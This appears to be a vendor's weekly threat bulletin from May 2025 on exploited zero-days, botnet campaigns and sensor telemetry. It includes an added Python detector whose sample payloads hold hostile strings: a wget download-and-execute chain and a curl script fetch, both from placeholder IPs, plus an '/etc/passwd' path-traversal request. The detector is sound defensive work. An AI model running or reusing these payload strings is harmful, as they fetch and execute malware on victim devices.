Zero-Day Exploitation Accelerates Across Core Enterprise Infrastructure

May 16, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

This week’s threat landscape was defined by rapid exploitation of zero-day vulnerabilities in widely used enterprise platforms, spotlighting the critical need for proactive patch management and defense strategies. Seven new vulnerabilities were added to the CISA KEV catalog, with five zero-day flaws targeting Microsoft’s core components, enabling attackers to gain SYSTEM-level privileges. A high-profile issue in TeleMessage TM SGNL, a secure messaging platform used by former U.S. national security advisor Michael Waltz, exposed sensitive plaintext archives, causing significant privacy concerns. Fortinet also addressed a zero-day affecting multiple products amid active exploitation.

Beyond these KEV additions, zero-day exploits were also actively observed in Google Chrome and Ivanti products, further emphasizing the expanding attack surface and the urgency of swift remediation.

Malicious botnet campaigns accelerated, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st exploiting vulnerabilities in Cloud Gateway, GitLab, and PHP-based services. At the same time, IoT malware such as Bashlite, BrickerBot, Tsunami, and Mirai intensified their focus on Eir D1000 modems, rapidly growing their botnet infrastructure.

Espionage efforts by the Türkiye-linked group Marbled Dust focused on a zero-day in the Output Messenger app, enabling stealthy intrusions. Concurrently, the Mirai botnet leveraged a critical flaw in MagicINFO 9 Server, prompting Samsung’s urgent patch release. The ongoing exploitation of a key SAP NetWeaver vulnerability by multiple threat actors signals its growing allure across cybercrime and state-sponsored operations.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed decisions.

CVE-2025-4427
An Authentication Bypass Vulnerability in the API component of Ivanti Endpoint Manager Mobile (versions 12.5.0.0 and earlier) allows attackers to access protected resources without valid credentials. Threat actors can chain this flaw with CVE-2025-4428 to execute arbitrary code on vulnerable devices without requiring authentication. Ivanti has addressed this critical issue by releasing patched versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1. Notably, this vulnerability has been actively exploited as a zero-day, underscoring the urgency for immediate updates.

CVE-2025-4428
A Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile allows threat actors to run arbitrary code on targeted systems without prior authentication. This flaw becomes even more dangerous when chained with CVE-2025-4427, enabling attackers to fully compromise vulnerable devices. Ivanti has released security patches in versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1 to address the issue. Critically, the vulnerability has been exploited in the wild as a zero-day, highlighting the pressing need for organizations to apply the available fixes without delay.

CVE-2025-4664
An Insufficient Policy Enforcement Vulnerability has been discovered within Google Chrome's browser architecture, specifically affecting the Loader logic. This flaw allows attackers to bypass built-in security measures, potentially enabling unauthorized code execution or sandbox escape, posing significant risks to user security. The vulnerability was initially disclosed via an X post, suggesting that malicious actors may have been exploiting this weakness for an extended period before a patch was released. In response, Google promptly updated Chrome’s Stable channel to versions 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux, addressing the issue and urging users to update immediately.

CVE-2025-30397
A Type Confusion Vulnerability in the Windows Scripting Engine was addressed in Microsoft's May 2025 Patch Tuesday update. Assigned a high CVSS Score of 7.5, this flaw, rooted in the engine's improper handling of object types, can allow a remote unauthenticated attacker to execute arbitrary code over the network. To successfully exploit this vulnerability, a victim must be tricked into accessing a maliciously crafted URL using Microsoft Edge in Internet Explorer mode. The attack chain requires an authenticated user to interact with the malicious content, allowing an unauthenticated attacker to execute code remotely. Due to its real-world exploitation in the wild as a zero-day and its potential for remote code execution, it has been added to the CISA KEV catalog.

CVE-2025-30400
A Use-After-Free Vulnerability in the Windows Desktop Window Manager (DWM) Core Library has been identified and assigned a high CVSS score of 7.8. This flaw could allow an authenticated attacker to elevate privileges locally, potentially granting SYSTEM-level access. Microsoft addressed this vulnerability as part of the May 2025 Patch Tuesday release and confirmed that it had been exploited in the wild as a zero-day. Therefore, this vulnerability has been promptly listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, signaling an urgent call for administrators to apply the patches without delay and strengthen their defenses.

CVE-2025-32756
A critical Stack-Based Buffer Overflow Vulnerability (CVSS 9.8) has been identified in several Fortinet products, including FortiFone, FortiVoice, FortiNDR and FortiMail. This flaw enables unauthenticated remote attackers to execute arbitrary code or commands by sending maliciously crafted HTTP requests. Fortinet has confirmed that this vulnerability is actively exploited in the wild as a zero-day, with FortiVoice appliances being a key target. Security patches have been issued for supported versions, while users of unsupported versions are advised to migrate to patched releases. The vulnerability's inclusion in the CISA KEV catalog underscores the urgency for immediate remediation.

CVE-2025-32701
A Use-After-Free Vulnerability in the Windows Common Log File System (CLFS) Driver was addressed by Microsoft in its May 2025 Patch Tuesday update. With a high CVSS score of 7.8, this flaw, if exploited successfully, could allow an attacker to gain SYSTEM-level privileges, granting full control over the affected system. Notably, Microsoft has confirmed that this vulnerability was actively exploited as a zero-day prior to the patch release. Due to its critical nature and active abuse, it has also been added to the CISA KEV catalog, emphasizing the urgency for immediate remediation.

CVE-2025-32706
A Heap-Based Buffer Overflow Vulnerability in the Windows Common Log File System (CLFS) Driver has been patched by Microsoft in its May 2025 Patch Tuesday release. With a high CVSS Score of 7.8, this flaw arises from insufficient input validation and enables a local authenticated attacker to escalate privileges and achieve SYSTEM-level access. Its active exploitation as a zero-day drew rapid attention from security teams and led to its subsequent inclusion in the CISA KEV catalog, signaling the need for immediate remediation across affected systems.

CVE-2025-32709
A Use-After-Free Vulnerability in the Windows Ancillary Function Driver for WinSock was patched by Microsoft in the May 2025 Patch Tuesday release. Assigned a high CVSS Score of 7.8, this flaw enables a local authenticated attacker to gain administrative privileges through improper memory handling. Given its active exploitation, it has been added to the CISA KEV catalog, emphasizing the urgency for organizations to apply security updates without delay.

CVE-2025-47729
A Hidden Functionality Vulnerability has been discovered in TeleMessage TM SGNL, where the archiving backend stores cleartext copies of user messages, significantly compromising data confidentiality. TeleMessage, a secure messaging platform previously used by high-profile individuals such as former U.S. National Security Advisor Mike Waltz, was exploited by threat actors to access sensitive data. The breach exposed private Telegram communications from Coinbase, a major cryptocurrency company, and a confidential list of hundreds of U.S. Customs and Border Protection employees. Due to the severity and real-world exploitation of this flaw, it has been added to the CISA KEV catalog, reinforcing the need for immediate mitigation and a review of archival practices.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

| CVE | Product | Severity | Title | Exploited in the wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution | True | False |
| CVE-2024-4577 | PHP-CGI on Windows | High | Critical argument injection vulnerability in PHP on Windows servers | True | True |
| CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True |
| CVE-2024-27348 | Apache HugeGraph-Server | Critical | Remote Command Execution vulnerability in Apache HugeGraph-Server | True | False |
| CVE-2023-4415 | Ruijie RG-EW1200G 07161417 r483 | High | Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 | True | False |
| CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False |
| CVE-2023-24488 | Citrix ADC and Citrix Gateway | Medium | Cross site scripting vulnerability in Citrix ADC and Citrix Gateway | True | False |
| CVE-2023-23752 | Joomla | Medium | Joomla! Improper Access Control Vulnerability | True | True |
| CVE-2023-26801 | LB-LINK | Critical | Command injection vulnerability in LB-LINK devices | True | False |
| CVE-2023-31192 | SoftEther VPN | Medium | Information Disclosure vulnerability in the ClientConnect() functionality of SoftEther VPN | False | False |

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented below are the top 5 CVEs with payloads suggestive of botnet activity, such as invoking wget against a raw IP address.

| CVE | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K |
| CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu |
| CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st |
| CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai |
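The "wget with a raw IP address" heuristic the section uses to tag sensor payloads as botnet-like, as an added Python example that is not part of this report or of Loginsoft's tooling. The request payloads are constructed (already URL-decoded) and the indicator regexes are my own assumptions about what a sensor's recorded request looks like; chmod and cd-to-temp are added as corroborating signals.

```python
import re
from ipaddress import ip_address

# Constructed sample request payloads, already URL-decoded, imitating what a
# sensor records. They are not captures from the report's sensors.
SAMPLE_PAYLOADS = [
    "GET /cgi-bin/;cd /tmp;wget http://192.0.2.10/bins/arm7;chmod +x arm7;./arm7 HTTP/1.1",
    "POST /api/run cmd=curl -O http://198.51.100.7/x.sh HTTP/1.1",
    "GET /shell?wget http://cdn.example.com/update.sh HTTP/1.1",  # hostname, not raw IP
    "GET /wp-login.php HTTP/1.1",
    "GET /download?file=../../etc/passwd HTTP/1.1",
]

# Downloader invocation whose URL host is a raw IPv4 literal (assumed pattern).
DOWNLOADER_RE = re.compile(
    r"\b(?P<tool>wget|curl)\b[^;|&\n]*?"                    # tool and its options
    r"(?:https?|ftp)://(?P<host>\d{1,3}(?:\.\d{1,3}){3})"   # URL with IPv4 host
)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
TMPDIR_RE = re.compile(r"\bcd\s+/(?:tmp|var/tmp|dev/shm)\b")


def classify_payload(payload: str) -> dict:
    """Return the botnet-style indicators found in one request payload.
    Primary signal: wget/curl fetching from a raw IP; the rest corroborate."""
    indicators, host = [], None
    m = DOWNLOADER_RE.search(payload)
    if m:
        try:
            host = str(ip_address(m.group("host")))  # rejects 999.1.1.1 etc.
            indicators.append(f"{m.group('tool')} from raw IPv4 {host}")
        except ValueError:
            pass
    if CHMOD_RE.search(payload):
        indicators.append("chmod to make dropped file executable")
    if TMPDIR_RE.search(payload):
        indicators.append("cd into world-writable directory")
    return {"botnet_suggestive": host is not None, "host": host, "indicators": indicators}


def triage(payloads):
    """Keep only payloads carrying the primary signal, with their indicators."""
    hits = []
    for p in payloads:
        result = classify_payload(p)
        if result["botnet_suggestive"]:
            hits.append((p, result))
    return hits
```

The hostname-based fetch in the third sample is deliberately not flagged, matching the report's criterion of a raw IP; the host value returned is what you would pivot on when requesting source addresses and payloads from the sensor data.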

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2025-4632
Samsung has released a critical security update to address CVE-2025-4632, a path traversal vulnerability in MagicINFO 9 Server that has been actively exploited as a zero-day. Acting as a patch bypass for the previously addressed CVE-2024-7399, this flaw came to light after SSD Disclosure published a proof-of-concept (PoC) on April 30, 2025, leading to in-the-wild exploitation, including instances where the Mirai botnet was deployed. Initially thought to be related to the older CVE-2024-7399, further investigation by cybersecurity firm Huntress revealed that even fully updated MagicINFO 9 Server instances (version 21.1050) were being compromised. Their analysis confirmed CVE-2025-4632 as the root cause, documenting three incidents in which unidentified actors used identical command sequences to download payloads like srvany.exe and services.exe and perform reconnaissance, highlighting the critical need for immediate patching and defensive hardening.

CVE-2025-27920
Microsoft has reported that since April 2024, the Türkiye-affiliated espionage group known as Marbled Dust has been actively exploiting CVE-2025-27920 as a zero-day vulnerability in Output Messenger, a cross-platform messaging application. This previously unknown flaw enabled the attackers to gain initial access to unpatched systems and deploy a malicious VBS-based backdoor (OMServerService.vbs) to the startup folder, granting persistent control. The campaign primarily targeted individuals associated with the Kurdish military in Iraq, aligning with Marbled Dust's historic focus on government and telecom sectors across the Middle East and Europe.

Once the system was compromised, a secondary Go-based payload (OMClientService.exe) was silently extracted to carry out system fingerprinting, command execution via the Windows command shell, and beaconing to command-and-control infrastructure. The attackers also leveraged Plink, the PuTTY command-line SSH client, to establish outbound tunnels for data exfiltration. Microsoft attributes this sophisticated campaign with high confidence to Marbled Dust, noting its overlap with other threat clusters such as Sea Turtle and UNC1326.

CVE-2025-31324
Multiple threat actors are now actively exploiting CVE-2025-31324, a critical vulnerability in SAP NetWeaver, underscoring its growing appeal across both cybercriminal and state-sponsored landscapes. According to ReliaQuest, the flaw has been leveraged by the BianLian extortion gang and the RansomExx ransomware operators (tracked by Microsoft as Storm-2460), signaling widespread criminal interest. In a separate campaign, attackers deployed a plugin-based trojan named PipeMagic via web shells after exploiting the same vulnerability, highlighting its versatility in post-exploitation scenarios. Meanwhile, EclecticIQ reports that China-linked groups UNC5221, UNC5174, and CL-STA-0048 are also abusing the flaw to deliver custom payloads, further intensifying the threat landscape around SAP NetWeaver.

| CVE | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2025-4632 | Critical | A Path Traversal Vulnerability in the Samsung MagicINFO 9 Server | Yes | Mirai | False |
| CVE-2025-27920 | Critical | A Directory Traversal Vulnerability in the Srimax Output Messenger | Yes | Marbled Dust | False |
| CVE-2025-31324 | Critical | Unrestricted File Upload Vulnerability in the SAP NetWeaver | Yes | BianLian, RansomEXX, PipeMagic, UNC5221, UNC5174, CL-STA-0048 | False |

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

| CVE-ID | Type of Vulnerability | Product | Reference |
|---|---|---|---|
| CVE-2025-22411 | Remote Code Execution | Android | Resource |
| CVE-2025-22442 | Elevation of Privilege | Android | Resource |
| CVE-2025-22873 | Path Traversal | Golang | Resource |
| CVE-2025-26416 | Elevation of Privilege | Android | Resource |

External References

  1. https://www.cisa.gov/news-events/alerts/2025/05/13/cisa-adds-five-known-exploited-vulnerabilities-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/05/14/cisa-adds-one-known-exploited-vulnerability-catalog
  3. https://www.cisa.gov/news-events/alerts/2025/05/06/cisa-adds-one-known-exploited-vulnerability-catalog
  4. https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
  5. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
  6. https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/
  7. https://chromereleases.googleblog.com/2025/05/stable-channel-update-for-desktop_14.html
  8. https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?
